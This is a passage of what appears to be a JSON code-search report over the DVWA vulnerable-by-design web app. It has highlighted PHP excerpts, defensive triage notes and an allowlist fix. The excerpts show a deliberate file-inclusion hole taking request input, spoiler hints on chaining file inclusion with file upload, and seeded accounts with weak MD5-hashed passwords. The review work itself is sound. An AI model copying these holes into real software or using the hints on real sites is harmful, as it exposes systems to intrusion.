operator\">></span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">47:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>RFI<span class=\"token punctuation\">:</span> Need <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> another vulnerability<span class=\"token punctuation\">,</span> such as file upload<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">50:</span> ",
  "line": 45,
  "start": 40,
  "end": 51,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 199,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/fi/source/{$vulnerabilityFile}\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">count</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"line-number\">35:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"highlight\"><span class=\"line-number\">36:</span> \t<span class=\"token function\">include</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">37:</span> <span class=\"token keyword\">else</span> {\n<span class=\"line-number\">38:</span> \t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Location:?page=include.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">40:</span> }\n<span 
class=\"line-number\">41:</span> ",
  "line": 36,
  "start": 31,
  "end": 42,
  "severity": "unknown",
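  "note": "Triage: include() on line 36 takes $file, which is not assigned in the lines shown; it appears to be set by the level file pulled in by the require_once on line 32. impossible.php in the source directory reads it from $_GET['page'] and exits unless it equals one of four fixed names. Review every level file under source/ for the same exact-match allowlist before treating this sink as safe."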
 },
 {
  "id": 202,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/impossible.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">5:</span> \n<span class=\"highlight\"><span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Only allow include<span class=\"token punctuation\">.</span>php <span class=\"token operator\">or</span> file{<span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token number\">3</span>}<span class=\"token punctuation\">.</span>php</span>\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file1.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file2.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token 
operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file3.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> }",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
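  "note": "Triage: the matched line is a comment. The code under it reads $file from $_GET['page'] and exits unless it equals include.php, file1.php, file2.php or file3.php; this exact-match allowlist is the control that keeps request data from choosing an arbitrary include path."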
 },
 {
  "id": 250,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/help/help.php",
  "filetype": "php",
  "search": "\\sinclude",
  "match": "<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>Worth looking <span class=\"token keyword\">for</span> any restrictions within any <span class=\"token string\">\"hidden\"</span> form fields<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">32:</span> \n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">34:</span> \n<span class=\"line-number\">35:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">36:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>Once the file has been received from the client<span class=\"token punctuation\">,</span> the server will try <span class=\"token keyword\">to</span> resize any image that was included <span class=\"token keyword\">in</span> the request<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\">&lt;</span>pre<span class=\"token 
operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\">&lt;</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>need <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> another vulnerability<span class=\"token punctuation\">,</span> such as file inclusion<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\">&lt;</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
  "line": 36,
  "start": 31,
  "end": 42,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 3,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">39:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">40:</span> }\n<span class=\"line-number\">41:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'users' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \n<span class=\"highlight\"><span class=\"line-number\">44:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert some data into users</span>\n<span class=\"line-number\">45:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get the base directory <span class=\"token keyword\">for</span> the avatar media<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">46:</span> <span class=\"token variable\">$baseUrl</span>  <span class=\"token operator\">=</span> <span class=\"token string\">'http://'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'PHP_SELF'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">47:</span> <span class=\"token variable\">$stripPos</span> <span class=\"token operator\">=</span> <span 
class=\"token function\">strpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">48:</span> <span class=\"token variable\">$baseUrl</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$baseUrl</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$stripPos</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/users/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> ",
  "line": 44,
  "start": 39,
  "end": 50,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 4,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">52:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'2'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Gordon'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Brown'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'gordonb'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'abc123'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}gordonb.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">53:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'3'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Hack'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Me'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'1337'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'charley'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}1337.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">54:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'4'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Pablo'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Picasso'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'pablo'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'letmein'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}pablo.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span 
class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">56:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">57:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token 
variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">58:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">59:</span> }\n<span class=\"line-number\">60:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">61:</span> \n<span class=\"line-number\">62:</span> ",
  "line": 57,
  "start": 52,
  "end": 63,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 5,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">55:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">NOW</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'0'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">56:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">57:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">59:</span> }\n<span class=\"highlight\"><span class=\"line-number\">60:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 
'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">61:</span> \n<span class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Create guestbook table\n<span class=\"line-number\">64:</span> <span class=\"token variable\">$create_tb_guestbook</span> <span class=\"token operator\">=</span> \"CREATE TABLE guestbook <span class=\"token punctuation\">(</span>comment_id SMALLINT UNSIGNED <span class=\"token operator\">NOT</span> <span class=\"token keyword\">NULL</span> AUTO_INCREMENT<span class=\"token punctuation\">,</span> comment <span class=\"token function\">varchar</span><span class=\"token punctuation\">(</span><span class=\"token number\">300</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> name <span class=\"token function\">varchar</span><span class=\"token punctuation\">(</span><span class=\"token number\">100</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PRIMARY KEY <span class=\"token punctuation\">(</span>comment_id<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">65:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$create_tb_guestbook</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 60,
  "start": 55,
  "end": 66,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 6,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">68:</span> }\n<span class=\"line-number\">69:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'guestbook' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \n<span class=\"highlight\"><span class=\"line-number\">72:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span></span>\n<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">)</span> {\n<span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }",
  "line": 72,
  "start": 67,
  "end": 78,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 7,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \n<span class=\"line-number\">72:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span>\n<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }\n<span class=\"line-number\">78:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">79:</span> \n<span class=\"line-number\">80:</span> ",
  "line": 75,
  "start": 70,
  "end": 81,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 8,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/MySQL.php",
  "filetype": "php",
  "search": "\\sinsert",
